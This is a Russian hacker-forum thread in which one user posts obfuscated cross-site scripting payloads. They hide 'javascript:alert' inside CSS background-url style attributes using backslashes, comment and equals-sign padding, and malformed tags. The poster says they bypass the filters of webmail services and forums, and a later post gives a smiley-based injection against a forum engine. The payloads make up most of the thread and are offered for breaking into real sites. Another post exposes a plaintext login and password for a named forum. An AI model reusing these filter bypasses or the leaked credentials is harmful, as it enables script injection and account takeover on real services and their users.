PDA

Просмотр полной версии : Новый обход фильтров форумов и и-мейлов используя атрибут style


Dyb
01.12.2005, 04:30
Эти структуры, проверял, работают на ВСЕХ и-мейлах как и на Русских, так и на Английских. Все что нужно, так это разрушить структуру тегов, что не смешите меня, для меня и для знающих, пустяки. На форуме труднее ломать структуру, чем на и-мейлах.


<html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\ (\'\w\j\'\)\)" >wj<a></body></html>

<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>


<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html> without single (') quotes.


<html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html> without single (') or double (") quotes.


<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html> With equals sign. (=) (=)


<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html> With equals sign and single quotes. (=) (=) (')


<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*=/='=\=w=\=j=\='=/=*=*=/=\=/=*=*/)/*=*=/=\==/=*=*/) >wj<a></body></html> With equals sign and single quotes, but text inside the alert box, omitted. (=) (=) (')



Просто интересно, что случается в этой комбинации для знающих. Легче всего просматривать в Фаерфоксе.

<html><img src="blah.gif" <onchange="alert('you cli=cked me')"></body></html>

и

<html><img src="blah.gif" <onchange="alert('you clicked me')"></body></html>





Вообщем не один фильтр, эти комбинации не палит, и можете это все проверить на locahost.


Все это проверялось, и все это вы можете проверить и сами, открыв блокнот, copy/paste одну из комбинаций моих кодов как и есть, и сохранить как filename.html

Работает только в браузере ИЕ.

:rolleyes:








А вот и моя коронка......


<html><img src="blah.gif" <span style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) me')"
<img src="blah.gif" <onchange="alert('you cli=cked me')">></body></html>

africanec
01.12.2005, 04:57
wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно
-----------------------------------------------------
з.ы. еще пару статей и будет готов твои психологический портрет!-)

Dyb
01.12.2005, 06:31
wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно
-----------------------------------------------------



Ладно, ты прав...так уж и быть имхо.

Должен сказать, что проверив почти все комбинации тегов, Я нашёл, что они ОЧЕНЬ сильно защищены имхо....ни в одном теги не проходит другой тег, и ни во едином теги не проходит двойная кавычка.

Но вот в чём фишка....во ВСЕХ тегах, проходит смайлик....



Что ну и что? А то, что вы сами теперь можете создавать свой смайлик и ломать через него...это типа, для выкрутасывания... +)

Ну а вот и сам код алёрта,


java script:alert().gif


В теге, использована табуляция....как её создать? Открываем блокнот, и жмём кнопочку

TAB

Через код который Я вам дал, можно создать свой смайлик и ломать через него....хотя Я пока сам не пробовал, так как это просто идея такая пришла когда засыпал и нужды толком так и не было к этому методу прибегать.

И ещё, во всех тегах проходят одинарная кавычка, ('), и апостроф (`), так что создать свой смаилик и через него ломать через любой тег, проблем существовать не должно.

Не забудьте, что смайлик работать не будет, если до смайлика и после, не будет стоять точка. (.)

Пример,

http://www.wj.8).gif

Результат,

<img src="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif" border=0 alt="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif">




Код тестился на форуме разработчиков форума, в версии ИЕ6. :rolleyes:

africanec
01.12.2005, 07:16
не я чото помню часика 2 тоже сморел чото вышло кривое непомню уже теперь на старой версии
ну со смайликами чото уж сильно замученно
--з.ы.--
зато я знаю где ты ненайдешь нечего
такой вот супер пупер мега куль форум-)

Антошка2003
01.12.2005, 07:17
а ты токв форумах уязвимости ищешь чтоли?

link.
01.12.2005, 07:41
мну именно этот форум (http://gamelot.ru/forum) интересует

Логин: tespich@newmail.ru
Пароль: 50301NmZzU

SanyaX
01.12.2005, 13:29
wj молодец за видео мне понравилось зилиные мибиры как всегда не одобрят забанят тебя скоро!

PinkPanther
02.12.2005, 01:17
Джоран, респект! Довольно интересные наработки, осталось тока проверить.

Otaku
02.12.2005, 04:02
Полезный человек этот Джордан.
Хоть и вредный... :cool:

Stream[kz]
21.12.2007, 14:33
парни такая проблема вот ввожу я <script>alert()</script> в хтмл пишет &lt;script&gt;alert()&lt;/script&gt; значит он фильтрует > и добавляет после них ; как мне это обойти помогите плиз незнаю куда обратится просто .

~EviL~
21.12.2007, 15:23
Ну ты и чайник... 1) Не туда запостил, это раздел СТАТЬИ. 2) &lt; и &gt; - это спец. символы, о которых ты явно не слышал... =\

Stream[kz]
21.12.2007, 17:24
А я и неговорил что умный темболее что &lt как я понел это < и &gt это > вот и спросил что нужно добавить чтоб не фильтровал =\

ground_zero
21.12.2007, 18:59
а реально перенести мтатью в раздел юиора болталка например ? я кислоты скушаю тоже поделюсь своими наблюдениями

SladerNon
21.12.2007, 20:55
Заметка то по сути гениальная! :). Особенно для 2005 года. :)

p.s. С ностальгией:
Джордан, джордан... куда же ты пропал!